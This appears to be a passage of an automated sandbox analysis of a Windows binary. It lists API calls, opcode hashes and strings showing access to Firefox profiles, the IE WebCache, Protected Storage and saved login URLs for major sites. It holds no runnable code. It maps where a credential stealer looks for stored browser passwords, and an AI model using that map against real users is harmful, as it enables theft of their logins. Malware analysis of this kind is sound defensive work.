                                                  • API ID: CreateFile$ErrorLastfree
                                                  • String ID:
                                                  • API String ID: 77810686-0
                                                  • Opcode ID: d3d8bbc7ba5a79f8a342b38920b53c153f9ef9857e0a0710124ad1068db44a69
                                                  • Instruction ID: e414679dc355763f7cb5844f7b2dc3c916de6b309c6ec43d815c5638ef366406
                                                  • Opcode Fuzzy Hash: d3d8bbc7ba5a79f8a342b38920b53c153f9ef9857e0a0710124ad1068db44a69
                                                  • Instruction Fuzzy Hash: 7741D0B1508701EFE7109F25EC4169BBBE5EFC4324F14892EF49596290E378D9848B96
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • memset.MSVCRT ref: 0040F042
                                                  • memset.MSVCRT ref: 0040F057
                                                    • Part of subcall function 00412270: SHGetSpecialFolderPathW.SHELL32(00000000,00000000,0000001A,00000000), ref: 004122AA
                                                    • Part of subcall function 0040719A: wcslen.MSVCRT ref: 0040719B
                                                    • Part of subcall function 0040719A: wcscat.MSVCRT ref: 004071B3
                                                  • wcscat.MSVCRT ref: 0040F080
                                                    • Part of subcall function 00412270: memset.MSVCRT ref: 004122C9
                                                    • Part of subcall function 00412270: RegCloseKey.ADVAPI32(?), ref: 00412330
                                                    • Part of subcall function 00412270: wcscpy.MSVCRT ref: 0041233E
                                                  • wcscat.MSVCRT ref: 0040F0A9
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.245754614.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  Yara matches
                                                  Similarity
                                                  • API ID: memsetwcscat$CloseFolderPathSpecialwcscpywcslen
                                                  • String ID: Mozilla\Firefox\Profiles$Mozilla\Profiles
                                                  • API String ID: 1534475566-1174173950
                                                  • Opcode ID: b40f1a29007ee88b205eab30251de60a7177f83a5dcce95581a050599bf5dc33
                                                  • Instruction ID: 125a097a9f26af6413fbc01dcc411eb2579d6a3fd62fad3348166db73649eeaa
                                                  • Opcode Fuzzy Hash: b40f1a29007ee88b205eab30251de60a7177f83a5dcce95581a050599bf5dc33
                                                  • Instruction Fuzzy Hash: BF018EB294021C75DB207B668C86ECF732CDF45358F1044BEB504E7182D9B88E888AA9
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                    • Part of subcall function 004121C3: LoadLibraryW.KERNEL32(shell32.dll,0040E314,00000000,?,00000002), ref: 004121D1
                                                    • Part of subcall function 004121C3: GetProcAddress.KERNEL32(00000000,SHGetSpecialFolderPathW), ref: 004121E6
                                                  • SHGetSpecialFolderPathW.SHELL32(00000000,00000000,0000001A,00000000), ref: 004122AA
                                                  • memset.MSVCRT ref: 004122C9
                                                  • RegCloseKey.ADVAPI32(?), ref: 00412330
                                                  • wcscpy.MSVCRT ref: 0041233E
                                                    • Part of subcall function 00407674: GetVersionExW.KERNEL32(00450DA8,0000001A,00412291), ref: 0040768E
                                                  Strings
                                                  • Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders, xrefs: 004122E4, 004122F4
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.245754614.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  Yara matches
                                                  Similarity
                                                  • API ID: AddressCloseFolderLibraryLoadPathProcSpecialVersionmemsetwcscpy
                                                  • String ID: Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
                                                  • API String ID: 2699640517-2036018995
                                                  • Opcode ID: c9c64e8e2f051e8caefe2aaada980519e2fc3c71178caf599d8c015b906c46d2
                                                  • Instruction ID: c2720df25ff2a98c700ebd4409fa2125fd2182e4a6debc52b8ada4298b6a052e
                                                  • Opcode Fuzzy Hash: c9c64e8e2f051e8caefe2aaada980519e2fc3c71178caf599d8c015b906c46d2
                                                  • Instruction Fuzzy Hash: 29110831800114BAEB24E7599E4EEEF737CEB05304F5100E7F914E2151E6B85FE5969E
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • wcschr.MSVCRT ref: 00411A2D
                                                  • _snwprintf.MSVCRT ref: 00411A52
                                                  • WritePrivateProfileStringW.KERNEL32(?,?,?,004495A0), ref: 00411A70
                                                  • GetPrivateProfileStringW.KERNEL32 ref: 00411A88
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.245754614.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  Yara matches
                                                  Similarity
                                                  • API ID: PrivateProfileString$Write_snwprintfwcschr
                                                  • String ID: "%s"
                                                  • API String ID: 1343145685-3297466227
                                                  • Opcode ID: 1379250297118e4f09543b187cbc7d5db4505a0d7fe81e2b8f9beab2005c4772
                                                  • Instruction ID: ae5f1e9df6cd2f4a0780795b96407545f38e06b3c9618b8e9942ee44aab69889
                                                  • Opcode Fuzzy Hash: 1379250297118e4f09543b187cbc7d5db4505a0d7fe81e2b8f9beab2005c4772
                                                  • Instruction Fuzzy Hash: 2101283240521ABAEF219F81EC05FDA3A6AFF04785F104066BA1960161D779C661EB98
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • GetModuleHandleW.KERNEL32(kernel32.dll,?,004112EE,?,?,?,?,?,00000000,?), ref: 00411151
                                                  • GetProcAddress.KERNEL32(00000000,GetProcessTimes), ref: 0041116B
                                                  • GetProcessTimes.KERNELBASE(00000000,?,?,?,?,?,004112EE,?,?,?,?,?,00000000,?), ref: 0041118E
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.245754614.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  Yara matches
                                                  Similarity
                                                  • API ID: AddressHandleModuleProcProcessTimes
                                                  • String ID: GetProcessTimes$kernel32.dll
                                                  • API String ID: 1714573020-3385500049
                                                  • Opcode ID: 464f22052b3d8a0ba402789ad02750f959a9c2b374b1230dcbafe23b26c1554b
                                                  • Instruction ID: be5b0e9885743e8d30da273d8ef78610b28524ab18dcfae55e11e98fa027414b
                                                  • Opcode Fuzzy Hash: 464f22052b3d8a0ba402789ad02750f959a9c2b374b1230dcbafe23b26c1554b
                                                  • Instruction Fuzzy Hash: 4FF01C35104308AFEB128FA0EC04B967BA9BB08749F048425F608C1671C775C9A0DF58
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.245754614.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  Yara matches
                                                  Similarity
                                                  • API ID: memcmp
                                                  • String ID: @ $SQLite format 3
                                                  • API String ID: 1475443563-3708268960
                                                  • Opcode ID: 995df855505f47d3fff5b3ee1df3959e9c0b6b49e494aa249aa3272b4713cf3f
                                                  • Instruction ID: bd67d5102a3eb66ea4de4e64a8b31fca419cb069452d494a6197ab8253893597
                                                  • Opcode Fuzzy Hash: 995df855505f47d3fff5b3ee1df3959e9c0b6b49e494aa249aa3272b4713cf3f
                                                  • Instruction Fuzzy Hash: D351D1719442149FDF10DF69C8827EAB7F4AF44314F14019BE804EB346E778EA85CB99
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • ??2@YAPAXI@Z.MSVCRT ref: 0040E0CE
                                                  • ??2@YAPAXI@Z.MSVCRT ref: 0040E0F7
                                                  • DeleteObject.GDI32(?), ref: 0040E129
                                                  • GetModuleHandleW.KERNEL32(00000000,00000000,?,?,00000000,0040E36A), ref: 0040E171
                                                  • LoadIconW.USER32(00000000,00000065), ref: 0040E17A
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.245754614.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  Similarity
                                                  • API ID: ??2@$DeleteHandleIconLoadModuleObject
                                                  • String ID:
                                                  • API String ID: 659443934-0
                                                  • Opcode ID: 5c24b57fa0e1cfdf7f3906394f540e2e73f2d4ee2212ac106c4666ba6c8c482e
                                                  • Instruction ID: 1cba439d4a63bd06fd13ecdd31e81b6a0d9710d4e5327182bdbee0994cb59d35
                                                  • Opcode Fuzzy Hash: 5c24b57fa0e1cfdf7f3906394f540e2e73f2d4ee2212ac106c4666ba6c8c482e
                                                  • Instruction Fuzzy Hash: 322193B19012989FDB30EF768C496DEB7A9AF84715F10863BF80CDB241DF794A118B58

                                                  APIs
                                                    • Part of subcall function 00408B10: OpenProcess.KERNEL32(00000040,00000000,?,00000104,00000000,?,00000104,00000000,00000000,00000104,Microsoft\Windows\WebCache\WebCacheV01.dat), ref: 00408B85
                                                    • Part of subcall function 00408B10: GetCurrentProcess.KERNEL32(00000000,80000000,00000000,00000000), ref: 00408BA4
                                                    • Part of subcall function 00408B10: DuplicateHandle.KERNEL32(00000000,00000104,00000000), ref: 00408BB1
                                                    • Part of subcall function 00408B10: GetFileSize.KERNEL32(00000000,00000000), ref: 00408BC6
                                                    • Part of subcall function 00408B10: CreateFileMappingW.KERNEL32(00000000,00000000,00000002,00000000,00000000,00000000), ref: 00408BF0
                                                    • Part of subcall function 00408B10: MapViewOfFile.KERNEL32(00000000,00000004,00000000,00000000,00000104), ref: 00408C05
                                                    • Part of subcall function 00408B10: WriteFile.KERNEL32(?,00000000,00000104,004091EB,00000000), ref: 00408C20
                                                    • Part of subcall function 00408B10: UnmapViewOfFile.KERNEL32(00000000), ref: 00408C27
                                                    • Part of subcall function 00408B10: CloseHandle.KERNEL32(?), ref: 00408C30
                                                  • CloseHandle.KERNEL32(000000FF,000000FF,00000000,?,004091EB,000000FF,00000000,00000104,Microsoft\Windows\WebCache\WebCacheV01.dat), ref: 00409074
                                                    • Part of subcall function 00408D9D: memset.MSVCRT ref: 00408E72
                                                    • Part of subcall function 00408D9D: wcschr.MSVCRT ref: 00408EAA
                                                    • Part of subcall function 00408D9D: memcpy.MSVCRT ref: 00408EDE
                                                  • DeleteFileW.KERNEL32(?,?,004091EB,000000FF,00000000,00000104,Microsoft\Windows\WebCache\WebCacheV01.dat), ref: 00409095
                                                  • CloseHandle.KERNEL32(000000FF,?,004091EB,000000FF,00000000,00000104,Microsoft\Windows\WebCache\WebCacheV01.dat), ref: 004090BC
                                                    • Part of subcall function 00408C67: memset.MSVCRT ref: 00408CAF
                                                    • Part of subcall function 00408C67: _snwprintf.MSVCRT ref: 00408D49
                                                    • Part of subcall function 00408C67: free.MSVCRT(000000FF,?,000000FF,00000000,00000104,74B5F560), ref: 00408D7D
                                                  Strings
                                                  • Microsoft\Windows\WebCache\WebCacheV01.dat, xrefs: 00408FB4
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.245754614.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  Similarity
                                                  • API ID: File$Handle$Close$ProcessViewmemset$CreateCurrentDeleteDuplicateMappingOpenSizeUnmapWrite_snwprintffreememcpywcschr
                                                  • String ID: Microsoft\Windows\WebCache\WebCacheV01.dat
                                                  • API String ID: 1979745280-1514811420
                                                  • Opcode ID: 296897d7b9fc56a1ed802aa42710325314df0d67c48e9c21b811ee4e31976f5b
                                                  • Instruction ID: f61eabc5127fffa0127996e1b9e76e3c42d0daca9916cdcd83e0194a9dfe4be1
                                                  • Opcode Fuzzy Hash: 296897d7b9fc56a1ed802aa42710325314df0d67c48e9c21b811ee4e31976f5b
                                                  • Instruction Fuzzy Hash: 10314CB1C006289BCF60DFA5CD855CEFBB8AF40315F1002ABA518B31A2DB756E85CF59

                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.245754614.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  Similarity
                                                  • API ID: _wcsicmpqsort
                                                  • String ID: /nosort$/sort
                                                  • API String ID: 1579243037-1578091866
                                                  • Opcode ID: b8bcc0ce675c29f22b0227198f2ab65a41989cf9845e13ce1ccf23b6e43e1f16
                                                  • Instruction ID: 426287280b2395c37d482f654794667c251e21b6a2c3e86ec69022cc6db77350
                                                  • Opcode Fuzzy Hash: b8bcc0ce675c29f22b0227198f2ab65a41989cf9845e13ce1ccf23b6e43e1f16
                                                  • Instruction Fuzzy Hash: 4821F8317006019FD714AB75C981E55B3A9FF95318F01053EF519A72D2CB7ABC11CB9A

                                                  APIs
                                                    • Part of subcall function 004117E3: FreeLibrary.KERNELBASE(?,00409EC4,00000000,004101A5,?,?,?,?,?,0040328B,?), ref: 004117EF
                                                  • LoadLibraryW.KERNELBASE(pstorec.dll,00000000,004101A5,?,?,?,?,?,0040328B,?), ref: 00409EC9
                                                  • GetProcAddress.KERNEL32(00000000,PStoreCreateInstance), ref: 00409EDC
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.245754614.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  Similarity
                                                  • API ID: Library$AddressFreeLoadProc
                                                  • String ID: PStoreCreateInstance$pstorec.dll
                                                  • API String ID: 145871493-2881415372
                                                  • Opcode ID: 0c221e4a7068c4d6934d41343829b8b78c46c2a8619205bb2734fd8b0e3e91f3
                                                  • Instruction ID: b7b877f0cca51cf4ed89ca0d343beedc6eb81d3109fbfde12955c258fb57ec89
                                                  • Opcode Fuzzy Hash: 0c221e4a7068c4d6934d41343829b8b78c46c2a8619205bb2734fd8b0e3e91f3
                                                  • Instruction Fuzzy Hash: 4DF0E2713047035BE7206BB99C45B9776E85F40715F10842EB126D16E2DBBCD9808BA9

                                                  APIs
                                                  • FindResourceW.KERNELBASE(?,?,?), ref: 00411F05
                                                  • SizeofResource.KERNEL32(?,00000000), ref: 00411F16
                                                  • LoadResource.KERNEL32(?,00000000), ref: 00411F26
                                                  • LockResource.KERNEL32(00000000), ref: 00411F31
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.245754614.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  Similarity
                                                  • API ID: Resource$FindLoadLockSizeof
                                                  • String ID:
                                                  • API String ID: 3473537107-0
                                                  • Opcode ID: adc4f220f09edc5477cff5d460e3159a0013e7b06a0f572b2b282906cd572301
                                                  • Instruction ID: cfb809c5d0a350ba8a2f28afb84d758f7034e38599ab5d81eab5ea4ee58a4c6c
                                                  • Opcode Fuzzy Hash: adc4f220f09edc5477cff5d460e3159a0013e7b06a0f572b2b282906cd572301
                                                  • Instruction Fuzzy Hash: 140192367042156BCB295FA5DC4999BBFAEFF867917088036F909C7331DB30D941C688

                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.245754614.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  Similarity
                                                  • API ID: ??3@
                                                  • String ID:
                                                  • API String ID: 613200358-0
                                                  • Opcode ID: 44d13ece2455e6bf70e94478653814ebefdf6deeb09379604d67fc2da5a05fd3
                                                  • Instruction ID: 4d75bcbf83e2a718e0a773ad5cf6a383805f84e699810b963ae7674306c23c36
                                                  • Opcode Fuzzy Hash: 44d13ece2455e6bf70e94478653814ebefdf6deeb09379604d67fc2da5a05fd3
                                                  • Instruction Fuzzy Hash: 05E080A1705301777A105B36BE55B0313EC3A703423D8041FF40AC3255DEBCC840441C

                                                  Strings
                                                  • only a single result allowed for a SELECT that is part of an expression, xrefs: 004380DE
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.245754614.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  Similarity
                                                  • API ID: memset
                                                  • String ID: only a single result allowed for a SELECT that is part of an expression
                                                  • API String ID: 2221118986-1725073988
                                                  • Opcode ID: fea911689c87fcb8dadeea6a797f322e67ae447bf2e03149324d6587d0a0c1b4
                                                  • Instruction ID: 9afff8ac9fdfbc15a9c7ae9a6e2295b57ef319e934304d2411a679509b53bb08
                                                  • Opcode Fuzzy Hash: fea911689c87fcb8dadeea6a797f322e67ae447bf2e03149324d6587d0a0c1b4
                                                  • Instruction Fuzzy Hash: 36826971A00318AFDF25DF69C881AAEBBA1EF08318F14511EFD1597292DB79E841CB94

                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.245754614.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  Similarity
                                                  • API ID: ??2@
                                                  • String ID:
                                                  • API String ID: 1033339047-0
                                                  • Opcode ID: 0567f08961b2cf397e8b5cffb80cfb7da57dcf973421e34affee400c22969a13
                                                  • Instruction ID: 97910a1e78d05b4995072b8892bf30812772bdb2f497aa37043254e3fee4362a
                                                  • Opcode Fuzzy Hash: 0567f08961b2cf397e8b5cffb80cfb7da57dcf973421e34affee400c22969a13
                                                  • Instruction Fuzzy Hash: AB01DEB16523406FEB58DB39EE67B2A66949B58351F48453EF207C91F6EAB4C840CA08

                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.245754614.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  Similarity
                                                  • API ID: memset
                                                  • String ID: 5lA$BINARY
                                                  • API String ID: 2221118986-2383938406
                                                  • Opcode ID: 5c1320cbab28b8c6fe770ef48558482079ba1b310d7c10d9b0a426fab7bf5df3
                                                  • Instruction ID: bfb3245fc00688105b1f81726e77846e409aff0e69a2cb21cfce066b793b8303
                                                  • Opcode Fuzzy Hash: 5c1320cbab28b8c6fe770ef48558482079ba1b310d7c10d9b0a426fab7bf5df3
                                                  • Instruction Fuzzy Hash: 52519C719443459FDB21DF68C8C1AEA7BE4AF08351F14446FE859CB381D778D980CBA9

                                                  APIs
                                                    • Part of subcall function 00414D9F: SetFilePointer.KERNELBASE(?,?,?,00000000), ref: 00414DC0
                                                    • Part of subcall function 00414D9F: GetLastError.KERNEL32 ref: 00414DD1
                                                    • Part of subcall function 00414D9F: GetLastError.KERNEL32 ref: 00414DD7
                                                  • ReadFile.KERNELBASE(?,?,?,?,00000000), ref: 00414E4C
                                                  • GetLastError.KERNEL32 ref: 00414E56
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.245754614.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  Similarity
                                                  • API ID: ErrorLast$File$PointerRead
                                                  • String ID:
                                                  • API String ID: 839530781-0
                                                  • Opcode ID: 3b8e0b6f2cdf357378df206a5466dbf18c64a2966c614271076d748b4fcb6fba
                                                  • Instruction ID: 78f6fc62e556ae6391f2b7d02d7635eeebb8002b3cc976368f6d55ef40470767
                                                  • Opcode Fuzzy Hash: 3b8e0b6f2cdf357378df206a5466dbf18c64a2966c614271076d748b4fcb6fba
                                                  • Instruction Fuzzy Hash: 20016D36244305BBEB108F65EC45BEB7B6CFB95761F100427F908D6240E774ED908AE9

                                                  APIs
                                                  • SetFilePointer.KERNELBASE(?,?,?,00000000), ref: 00414DC0
                                                  • GetLastError.KERNEL32 ref: 00414DD1
                                                  • GetLastError.KERNEL32 ref: 00414DD7
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.245754614.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  Similarity
                                                  • API ID: ErrorLast$FilePointer
                                                  • String ID:
                                                  • API String ID: 1156039329-0
                                                  • Opcode ID: 77788fb3081b482f24613af2ac918d7e659f5b9ca52062a4a7545bad1632a255
                                                  • Instruction ID: ce6d17c8e1bf95b997c08e1a60c9ed70337bd99ba9d8843779863386e1f48c80
                                                  • Opcode Fuzzy Hash: 77788fb3081b482f24613af2ac918d7e659f5b9ca52062a4a7545bad1632a255
                                                  • Instruction Fuzzy Hash: 16F03936A10119BBCF009F74EC019EA7BA8EB45760B104726E822E6690EB30EA409AD4

                                                  APIs
                                                  • malloc.MSVCRT ref: 00407491
                                                  • memcpy.MSVCRT ref: 004074A9
                                                  • free.MSVCRT(00000000,00000000,?,00408025,00000002,?,00000000,?,004082EE,00000000,?,00000000), ref: 004074B2
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.245754614.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  Similarity
                                                  • API ID: freemallocmemcpy
                                                  • String ID:
                                                  • API String ID: 3056473165-0
                                                  • Opcode ID: cfd8dded6270ab76b115604b577ea4a7b41de6cad30d2a4b436932789bdeb74f
                                                  • Instruction ID: e360d5709d2f3202c1ca25caae3d4aa805c65bf3858a1f44a91d23c9b12a71fe
                                                  • Opcode Fuzzy Hash: cfd8dded6270ab76b115604b577ea4a7b41de6cad30d2a4b436932789bdeb74f
                                                  • Instruction Fuzzy Hash: FFF0E972A082229FD708EB75A94180B779DAF44364710442FF404E3281D738AC40C7A9

                                                  APIs
                                                  • FreeLibrary.KERNELBASE(?,?,0040FF66,?,?,00403292,?), ref: 0044234D
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.245754614.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  Similarity
                                                  • API ID: FreeLibrary
                                                  • String ID: Lh@
                                                  • API String ID: 3664257935-1564020105
                                                  • Opcode ID: 9d0562313ed05c1077c8e865d76b3287021ad506fa066eb96027120c77a5f393
                                                  • Instruction ID: 76fd25b73cfe59c43d76c33e9e0e0ec1b0c89da13299cefcee144e01fa2b623b
                                                  • Opcode Fuzzy Hash: 9d0562313ed05c1077c8e865d76b3287021ad506fa066eb96027120c77a5f393
                                                  • Instruction Fuzzy Hash: 33E0F6B5900B008F93308F2BE944407FBF9BFE56113108E1FE4AAC2A24C3B4A6458F54

                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.245754614.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  Similarity
                                                  • API ID:
                                                  • String ID: d
                                                  • API String ID: 0-2564639436
                                                  • Opcode ID: ce38069431d75cbd9469390c6fd040c4a17fe8be27d7aae76b779c9a917add19
                                                  • Instruction ID: 01fd0a19dca965820be780cd5e1a180e940d32085fcd4292c33d665daa4a4ca3
                                                  • Opcode Fuzzy Hash: ce38069431d75cbd9469390c6fd040c4a17fe8be27d7aae76b779c9a917add19
                                                  • Instruction Fuzzy Hash: B7819D716083519FCB10EF1AC84169FBBE0AFC8318F15592FF88497251D778EA85CB9A

                                                  APIs
                                                    • Part of subcall function 0040B1B3: ??2@YAPAXI@Z.MSVCRT ref: 0040B1D4
                                                    • Part of subcall function 0040B1B3: ??3@YAXPAX@Z.MSVCRT ref: 0040B29B
                                                  • GetStdHandle.KERNEL32(000000F5,?,00000000,00000001,?,?,?,0040E2DC,00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 0040C5DC
                                                  • FindCloseChangeNotification.KERNELBASE(00000000,?,?,?,0040E2DC,00000000,00000000,?,00000000,00000000,00000000), ref: 0040C6E9
                                                    • Part of subcall function 0040715D: CreateFileW.KERNELBASE(00000000,40000000,00000001,00000000,00000002,00000000,00000000,0040C5D7,?,?,00000000,00000001,?,?,?,0040E2DC), ref: 0040716F
                                                    • Part of subcall function 004071BD: GetLastError.KERNEL32(00000000,?,0040C6FE,00000000,?,?,?,0040E2DC,00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 004071D1
                                                    • Part of subcall function 004071BD: _snwprintf.MSVCRT ref: 004071FE
                                                    • Part of subcall function 004071BD: MessageBoxW.USER32(?,?,Error,00000030), ref: 00407217
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.245754614.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  Similarity
                                                  • API ID: ??2@??3@ChangeCloseCreateErrorFileFindHandleLastMessageNotification_snwprintf
                                                  • String ID:
                                                  • API String ID: 1161345128-0
                                                  • Opcode ID: 437b4ee2f0eb5be7c77dedbcd6cde51050b7bc30ff96baad5e2726301dc593ae
                                                  • Instruction ID: 8008e0f7e2c68a0a7dbf7afa260ddf7c08443fea941bd9d01fd0dc6d198c04cd
                                                  • Opcode Fuzzy Hash: 437b4ee2f0eb5be7c77dedbcd6cde51050b7bc30ff96baad5e2726301dc593ae
                                                  • Instruction Fuzzy Hash: 82415F31B00100EBCB359F69C8C9E5E76A5AF45710F215A2BF406A73D1CB7AAD80CA5D

                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.245754614.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  Similarity
                                                  • API ID: _wcsicmp
                                                  • String ID: /stext
                                                  • API String ID: 2081463915-3817206916
                                                  • Opcode ID: e7410df3178ec06b149dd267b323e01f272d5e4eb36cc30877f85b29a899849a
                                                  • Instruction ID: 5da650caeba3f583edd317abe6dc9e2273d49bc4fc560570e2d9775ed52fc578
                                                  • Opcode Fuzzy Hash: e7410df3178ec06b149dd267b323e01f272d5e4eb36cc30877f85b29a899849a
                                                  • Instruction Fuzzy Hash: 37218170B00105AFD704FFAA89C1A9DB7A9BF94304F1045BEE415F7382DB79AD218B59

                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.245754614.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  Similarity
                                                  • API ID: wcslen$FileFindFirst
                                                  • String ID: index.dat
                                                  • API String ID: 1858513025-427268347
                                                  • Opcode ID: b5a9187b74a8ffb00ae391732f5c189a4998f68d39988537941cb2dcf05d029e
                                                  • Instruction ID: ea6e303a67c95597c7ba2300e155a691c3aaaa96276431a044c3ae834a976286
                                                  • Opcode Fuzzy Hash: b5a9187b74a8ffb00ae391732f5c189a4998f68d39988537941cb2dcf05d029e
                                                  • Instruction Fuzzy Hash: 8601527180526999EB20E662CD426DE727CAF00314F1041BBA858F21D2EB3CDF868F4D

                                                  Strings
                                                  • failed to allocate %u bytes of memory, xrefs: 00412B57
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.245754614.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  Similarity
                                                  • API ID: malloc
                                                  • String ID: failed to allocate %u bytes of memory
                                                  • API String ID: 2803490479-1168259600
                                                  • Opcode ID: f24fcd6304b93913b14247a0557fa27672ef6dd59737270ab95038e43013476f
                                                  • Instruction ID: 83e647f58a001b4b33716092e1dc9084e7a57e1649cb419fd0ecfe0012ae2b1c
                                                  • Opcode Fuzzy Hash: f24fcd6304b93913b14247a0557fa27672ef6dd59737270ab95038e43013476f
                                                  • Instruction Fuzzy Hash: B1E026B7F4561267C2004F1AEC019866790AFC032171A063BF92CD7380D678E9A683A9

                                                  APIs
                                                  • Sleep.KERNEL32(00000064), ref: 00414DFF
                                                  • FindCloseChangeNotification.KERNELBASE(0CC483FF,00000000,00000000,0045162C,00415453,00000008,00000000,00000000,?,00415610,?,00000000), ref: 00414E08
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.245754614.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ChangeCloseFindNotificationSleep
                                                  • String ID:
                                                  • API String ID: 1821831730-0
Uniqueness
Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 00000003.00000002.245754614.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
Yara matches
Similarity
• API ID: memcmpmemset
• String ID:
• API String ID: 1065087418-0
Uniqueness
Uniqueness Score: -1.00%

APIs
  • Part of subcall function 004038C4: LoadLibraryW.KERNEL32(advapi32.dll,?,00409AAA,?,https://login.yahoo.com/config/login,00000000,http://www.facebook.com/,00000000,https://www.google.com/accounts/servicelogin,00000000,?,00000000,?,0041018E,?,?), ref: 004038CF
  • Part of subcall function 004038C4: GetProcAddress.KERNEL32(00000000,CryptAcquireContextA), ref: 004038E3
  • Part of subcall function 004038C4: GetProcAddress.KERNEL32(?,CryptReleaseContext), ref: 004038EF
  • Part of subcall function 004038C4: GetProcAddress.KERNEL32(?,CryptCreateHash), ref: 004038FB
  • Part of subcall function 004038C4: GetProcAddress.KERNEL32(?,CryptGetHashParam), ref: 00403907
  • Part of subcall function 004038C4: GetProcAddress.KERNEL32(?,CryptHashData), ref: 00403913
  • Part of subcall function 004038C4: GetProcAddress.KERNEL32(?,CryptDestroyHash), ref: 0040391F
• wcslen.MSVCRT ref: 00409901
• memset.MSVCRT ref: 00409980
Memory Dump Source
• Source File: 00000003.00000002.245754614.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
Yara matches
Similarity
• API ID: AddressProc$LibraryLoadmemsetwcslen
• String ID:
• API String ID: 1960736289-0
Uniqueness
Uniqueness Score: -1.00%

APIs
  • Part of subcall function 0040EDFA: memset.MSVCRT ref: 0040EE42
  • Part of subcall function 0040EDFA: wcslen.MSVCRT ref: 0040EE59
  • Part of subcall function 0040EDFA: wcslen.MSVCRT ref: 0040EE61
  • Part of subcall function 0040EDFA: wcslen.MSVCRT ref: 0040EEBC
  • Part of subcall function 0040EDFA: wcslen.MSVCRT ref: 0040EECA
  • Part of subcall function 0040797A: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,02000000,00000000,00000000,00000000,0040EDAE,00000000,?,00000000,?,00000000), ref: 00407992
  • Part of subcall function 0040797A: GetFileTime.KERNEL32(00000000,00000000,00000000,?), ref: 004079A6
  • Part of subcall function 0040797A: CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,004101ED), ref: 004079AF
• CompareFileTime.KERNEL32(?,?,00000000,?,00000000), ref: 0040EDB8
Memory Dump Source
• Source File: 00000003.00000002.245754614.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
Yara matches
Similarity
• API ID: wcslen$File$Time$CloseCompareCreateHandlememset
• String ID:
• API String ID: 4204647287-0
Uniqueness
Uniqueness Score: -1.00%

APIs
• GetPrivateProfileIntW.KERNEL32 ref: 00411B5D
  • Part of subcall function 004119C6: memset.MSVCRT ref: 004119E5
  • Part of subcall function 004119C6: _itow.MSVCRT ref: 004119FC
  • Part of subcall function 004119C6: WritePrivateProfileStringW.KERNEL32(?,?,00000000), ref: 00411A0B
Memory Dump Source
